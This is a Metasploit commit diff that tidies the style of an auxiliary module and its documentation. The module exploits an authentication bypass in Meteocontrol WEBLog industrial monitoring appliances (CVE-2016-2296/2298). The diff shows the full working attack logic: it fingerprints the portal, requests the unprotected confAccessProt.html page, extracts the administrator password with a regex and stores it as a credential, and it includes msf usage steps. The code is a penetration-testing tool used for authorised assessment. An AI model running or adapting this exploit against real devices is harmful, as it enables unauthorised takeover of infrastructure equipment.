rubocop check & msftidy clean. Few updates.

juushya · juushya · commit 657c7444bf27 · 2017-01-17T00:17:57.000+05:30
diff --git a/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md
@@ -4,7 +4,7 @@ Note: In some versions, 'Website password' page is renamed or not present. There
 
 ## Verification Steps
 
-1. Do: ```auxiliary/scanner/http/meteocontrol_weblog_extractadmin```
+1. Do: ```use auxiliary/scanner/http/meteocontrol_weblog_extractadmin```
 2. Do: ```set RHOSTS [IP]```
 3. Do: ```set RPORT [PORT]```
 4. Do: ```run```
@@ -13,36 +13,6 @@ Note: In some versions, 'Website password' page is renamed or not present. There
 
   ```
 msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin
-msf auxiliary(meteocontrol_weblog_extractadmin) > info
-
-       Name: MeteoControl WEBLog Password Extractor
-     Module: auxiliary/scanner/http/meteocontrol_weblog_extractadmin
-    License: Metasploit Framework License (BSD)
-       Rank: Normal
-
-Provided by:
-  Karn Ganeshen <KarnGaneshen@gmail.com>
-
-Basic options:
-  Name     Current Setting  Required  Description
-  ----     ---------------  --------  -----------
-  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-  RHOSTS                    yes       The target address range or CIDR identifier
-  RPORT    8080             yes       The target port
-  SSL      false            no        Negotiate SSL/TLS for outgoing connections
-  THREADS  1                yes       The number of concurrent threads
-  VHOST                     no        HTTP server virtual host
-
-Description:
-  This module exploits an authentication bypass vulnerability in 
-  Meteocontrol WEBLog (all models) to extract Administrator password 
-  for the device management portal.
-
-References:
-  https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01
-  http://cvedetails.com/cve/2016-2296/
-  http://cvedetails.com/cve/2016-2298/
-
 msf auxiliary(meteocontrol_weblog_extractadmin) > set rhosts 1.2.3.4
 msf auxiliary(meteocontrol_weblog_extractadmin) > run
 
diff --git a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
@@ -15,25 +15,25 @@ def initialize(info={})
     super(update_info(info,
       'Name'        => 'Meteocontrol WEBlog Password Extractor',
       'Description' => %{
-          This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models) to extract Administrator password for the device management portal.
+          This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog appliances (software version < May 2016 release) to extract Administrator password for the device management portal.
       },
       'References'  =>
         [
-             [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01' ],
-             [ 'CVE', '2016-2296' ],
-             [ 'CVE', '2016-2298' ]
+          ['URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01'],
+          ['CVE', '2016-2296'],
+          ['CVE', '2016-2298']
         ],
       'Author'         =>
         [
-          'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
+          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
         ],
-      'License'        => MSF_LICENSE
-    ))
+      'License'        => MSF_LICENSE))
 
     register_options(
-    [
-        Opt::RPORT(8080)	# Application may run on a different port too. Change port accordingly.
-    ], self.class)
+      [
+        Opt::RPORT(8080) # Application may run on a different port too. Change port accordingly.
+      ], self.class
+    )
   end
 
   def run_host(ip)
@@ -50,17 +50,17 @@ def run_host(ip)
 
   def is_app_metweblog?
     begin
-      res = send_request_cgi(
-      {
-        'uri'       => '/html/en/index.html',
-        'method'    => 'GET'
+      res = send_request_cgi({
+        'uri'     => '/html/en/index.html',
+        'method'  => 'GET'
       })
+
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
       print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
       return false
     end
 
-    if (res and res.code == 200 and (res.headers['Server'] and res.headers['Server'].include?("IS2 Web Server") or res.body.include?("WEB'log")))
+    if (res && res.code == 200 && (res.headers['Server'] && res.headers['Server'].include?("IS2 Web Server") || res.body.include?("WEB'log")))
       print_good("#{rhost}:#{rport} - Running Meteocontrol WEBlog management portal...")
       return true
     else
@@ -77,27 +77,27 @@ def do_extract()
 
     print_status("#{rhost}:#{rport} - Attempting to extract Administrator password...")
     begin
-      res = send_request_cgi(
-      {
-        'uri'       => '/html/en/confAccessProt.html',
-        'method'    => 'GET'
+      res = send_request_cgi({
+          'uri'       => '/html/en/confAccessProt.html',
+          'method'    => 'GET'
       })
 
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
       print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
       return
     end
 
-    if (res and res.code == 200 and res.body.include?("szWebAdminPassword") or res.body=~ /Admin Monitoring/)
+    if (res && res.code == 200 && (res.body.include?("szWebAdminPassword") || res.body=~ /Admin Monitoring/))
       get_admin_password = res.body.match(/name="szWebAdminPassword" value="(.*?)"/)
       admin_password = get_admin_password[1]
       print_good("#{rhost}:#{rport} - Password is #{admin_password}")
       report_cred(
-                ip: rhost,
-                port: rport,
-                service_name: 'Meteocontrol WEBlog Management Portal',
-                password: admin_password,
-                proof: res.body)
+        ip: rhost,
+        port: rport,
+        service_name: 'Meteocontrol WEBlog Management Portal',
+        password: admin_password,
+        proof: res.body
+      )
     else
       # In some models, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Try login manually in such cases.
       print_error("Password not found. Check login manually.")
